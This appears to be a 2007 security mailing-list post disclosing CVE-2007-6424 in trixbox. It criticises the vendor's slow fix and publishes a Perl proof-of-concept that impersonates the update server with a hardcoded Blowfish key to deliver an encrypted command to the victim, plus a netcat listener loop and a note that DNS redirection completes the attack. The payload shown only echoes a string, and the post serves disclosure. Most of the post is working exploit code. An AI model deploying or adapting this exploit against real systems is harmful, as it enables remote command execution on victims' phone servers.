[VOIPSEC] trixbox vuln (CVE-2007-6424) - PoC exploit code

Than Taro thanrantaro at live.com
Tue Dec 18 21:25:46 CST 2007


Since Fonality has been incredibly slow in dealing with this (it was
reported publicly on Saturday, and they don't expect to have a fix
until at least Friday), I decided to take it upon myself to get a CVE,
and also
write some exploit code.  I feel that 72+ hours is more than enough
time to fix something this simple.  They also do not appear to have any
intentions of posting an advisory.





Run this in a simple script such as `while :; do netcat -l -p 80 -c
"perl trixbox-exploit.pl"; done`, and then a trivial DNS redirection
can take it from there.





trixbox:~$ cat trixbox-exploit.pl


#!/usr/bin/perl





use strict;


use Crypt::CBC;





my $cipher = Crypt::CBC->new( -cipher => "Blowfish", -key => "00000000000000000000000000000000" );





my $req = <STDIN>;


chomp $req;





my $hax;





if( $req =~ /ce00000000000000000000000000000000/ )


{


        $hax = $cipher->encrypt( "1\nce00000000000000000000000000000000\necho Exploited" );


}


elsif( $req =~ /generate_id/ )


{


        $hax = "ce00000000000000000000000000000000\n00000000000000000000000000000000";


}


else


{


        $hax = "ERROR: invalid server id";


}





print "$hax";




trixbox:~$ 



_________________________________________________________________
Share life as it happens with the new Windows Live.
http://www.windowslive.com/share.html?ocid=TXT_TAGHM_Wave2_sharelife_122007


More information about the Voipsec mailing list